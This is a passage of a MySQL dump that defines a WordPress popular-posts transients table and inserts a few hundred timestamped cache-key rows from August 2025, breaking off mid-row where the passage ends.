/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_popularpoststransients` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `tkey` varchar(191) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `tkey_date` datetime NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=55652 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_popularpoststransients`
--

LOCK TABLES `wp_popularpoststransients` WRITE;
/*!40000 ALTER TABLE `wp_popularpoststransients` DISABLE KEYS */;
INSERT INTO `wp_popularpoststransients` VALUES (1,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 07:58:36'),(2,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:16:05'),(3,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:17:54'),(4,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:41:48'),(5,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:44:41'),(6,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:46:24'),(7,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 08:49:53'),(8,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:01:03'),(9,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:05:23'),(10,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:07:03'),(11,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:11:12'),(12,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:14:26'),(13,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:16:31'),(14,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:29:09'),(15,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:33:09'),(16,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 09:36:51'),(17,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 10:02:36'),(18,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 10:05:47'),(19,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 10:32:50'),(20,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 10:36:14'),(21,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 10:50:37'),(22,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 11:23:45'),(23,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 11:47:18'),(24,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 11:52:04'),(25,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:00:48'),(26,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:22:48'),(27,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:38:43'),(28,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:42:20'),(29,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:49:27'),(30,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:51:08'),(31,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:53:14'),(32,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 12:59:44'),(33,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:01:42'),(34,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:07:38'),(35,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:11:12'),(36,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:22:20'),(37,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:30:25'),(38,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 13:59:20'),(39,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 14:15:22'),(40,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 14:26:16'),(41,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 14:46:55'),(42,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 15:04:22'),(43,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 15:20:45'),(44,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 15:36:23'),(45,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 15:45:58'),(46,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 15:49:30'),(47,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:04:15'),(48,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:10:59'),(49,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:15:59'),(50,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:23:04'),(51,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:26:17'),(52,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:34:23'),(53,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 16:42:26'),(54,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 17:00:31'),(55,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 17:29:29'),(56,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 17:42:20'),(57,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 17:57:42'),(58,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 18:01:01'),(59,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 18:05:26'),(60,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 18:12:16'),(61,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 18:38:28'),(62,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:09:06'),(63,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:14:48'),(64,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:16:16'),(65,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:24:13'),(66,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:33:30'),(67,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:38:39'),(68,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 19:48:08'),(69,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 20:12:03'),(70,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 20:31:59'),(71,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 20:46:36'),(72,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 20:54:53'),(73,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 20:58:28'),(74,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 21:24:37'),(75,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 21:30:58'),(76,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 21:35:39'),(77,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 21:54:04'),(78,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:03:02'),(79,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:05:11'),(80,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:13:50'),(81,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:18:47'),(82,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:24:47'),(83,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:36:00'),(84,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:39:28'),(85,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 22:54:44'),(86,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:03:29'),(87,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:16:28'),(88,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:18:54'),(89,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:23:31'),(90,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:35:17'),(91,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:42:06'),(92,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:46:17'),(93,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-11 23:58:03'),(94,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 00:04:20'),(95,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 00:05:21'),(96,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 00:15:27'),(97,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 00:32:55'),(98,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 00:51:37'),(99,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:05:02'),(100,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:06:05'),(101,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:07:10'),(102,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:08:11'),(103,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:16:23'),(104,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 01:32:31'),(105,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 02:05:06'),(106,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 02:30:51'),(107,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 03:18:51'),(108,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 03:47:28'),(109,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 03:54:45'),(110,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 04:27:00'),(111,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 04:31:05'),(112,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 04:44:12'),(113,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:05:10'),(114,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:09:44'),(115,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:11:35'),(116,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:14:43'),(117,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:29:47'),(118,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:34:48'),(119,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:44:32'),(120,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 05:47:00'),(121,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 06:15:20'),(122,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 06:22:52'),(123,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 06:35:22'),(124,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 07:16:07'),(125,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 07:51:25'),(126,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 08:20:51'),(127,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 08:21:56'),(128,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 08:26:06'),(129,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 08:51:48'),(130,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 09:28:26'),(131,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 09:31:05'),(132,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 09:34:11'),(133,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 09:59:24'),(134,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:05:29'),(135,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:19:35'),(136,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:20:56'),(137,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:31:28'),(138,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:53:05'),(139,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 10:58:32'),(140,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:01:11'),(141,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:03:36'),(142,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:05:12'),(143,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:33:31'),(144,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:37:17'),(145,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:49:11'),(146,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:55:07'),(147,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 11:57:21'),(148,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 12:12:45'),(149,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 12:14:11'),(150,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 12:15:57'),(151,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 12:18:03'),(152,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 13:04:03'),(153,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 13:14:07'),(154,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 13:35:16'),(155,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:13:36'),(156,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:16:25'),(157,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:23:38'),(158,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:39:31'),(159,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:53:04'),(160,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 14:58:54'),(161,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:09:47'),(162,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:20:40'),(163,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:35:37'),(164,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:45:51'),(165,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:49:05'),(166,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 15:56:57'),(167,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:04:19'),(168,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:07:33'),(169,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:11:11'),(170,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:15:45'),(171,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:23:53'),(172,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:31:59'),(173,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:40:24'),(174,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:47:57'),(175,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:49:25'),(176,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:51:52'),(177,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 16:55:10'),(178,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:16:53'),(179,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:23:40'),(180,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:24:43'),(181,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:27:12'),(182,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:32:40'),(183,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:36:20'),(184,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:40:17'),(185,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 17:44:14'),(186,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:00:34'),(187,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:08:48'),(188,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:11:46'),(189,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:30:57'),(190,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:40:33'),(191,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:45:12'),(192,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:49:35'),(193,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:54:22'),(194,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:56:13'),(195,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 18:58:14'),(196,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:05:51'),(197,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:09:08'),(198,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:12:42'),(199,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:27:40'),(200,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:39:51'),(201,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:43:48'),(202,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:47:14'),(203,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 19:57:10'),(204,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:00:20'),(205,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:02:51'),(206,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:13:44'),(207,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:21:16'),(208,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:23:37'),(209,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:37:52'),(210,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:40:13'),(211,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:42:47'),(212,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:49:31'),(213,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:51:19'),(214,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 20:53:19'),(215,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:13:13'),(216,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:15:38'),(217,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:18:10'),(218,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:21:34'),(219,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:37:33'),(220,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:44:49'),(221,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 21:48:45'),(222,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 22:20:37'),(223,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 22:47:25'),(224,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 22:55:38'),(225,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:07:18'),(226,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:09:43'),(227,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:13:45'),(228,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:41:13'),(229,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:42:17'),(230,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:45:05'),(231,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:50:54'),(232,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-12 23:54:42'),(233,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:02:06'),(234,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:03:09'),(235,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:04:19'),(236,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:10:40'),(237,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:41:05'),(238,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:45:25'),(239,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:48:38'),(240,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:57:54'),(241,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 00:59:52'),(242,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:03:45'),(243,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:08:58'),(244,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:18:57'),(245,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:33:58'),(246,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:35:42'),(247,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 01:44:11'),(248,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 02:18:45'),(249,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 02:34:02'),(250,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 02:46:13'),(251,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 03:09:20'),(252,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 03:15:51'),(253,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 03:32:14'),(254,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 03:35:36'),(255,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 03:48:44'),(256,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:13:43'),(257,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:18:51'),(258,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:23:58'),(259,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:26:17'),(260,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:28:08'),(261,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:31:04'),(262,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:41:50'),(263,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 04:43:23'),(264,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 05:14:27'),(265,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 05:34:58'),(266,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 06:11:42'),(267,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 06:54:14'),(268,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:23:16'),(269,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:30:17'),(270,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:42:48'),(271,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:44:47'),(272,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:53:02'),(273,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 07:59:23'),(274,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:05:30'),(275,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:15:52'),(276,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:21:15'),(277,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:31:19'),(278,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:32:59'),(279,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:36:29'),(280,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:46:36'),(281,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 08:48:03'),(282,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:00:16'),(283,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:01:30'),(284,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:27:12'),(285,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:29:54'),(286,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:31:48'),(287,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:37:38'),(288,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:47:18'),(289,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 09:59:06'),(290,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 10:33:59'),(291,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 10:46:46'),(292,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 11:04:38'),(293,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 11:20:24'),(294,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 11:21:46'),(295,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 11:40:43'),(296,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 11:47:49'),(297,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 12:27:14'),(298,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 12:31:15'),(299,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 12:53:56'),(300,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:09:58'),(301,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:12:40'),(302,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:34:21'),(303,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:36:50'),(304,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:46:28'),(305,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 13:48:41'),(306,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 14:34:52'),(307,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 15:02:42'),(308,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 15:32:21'),(309,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 15:55:11'),(310,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:15:35'),(311,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:16:44'),(312,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:17:50'),(313,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:19:59'),(314,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:29:30'),(315,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:30:38'),(316,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:32:54'),(317,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 16:36:57'),(318,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:01:31'),(319,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:02:33'),(320,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:15:10'),(321,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:17:26'),(322,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:21:28'),(323,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:22:46'),(324,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 17:43:25'),(325,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-08-13 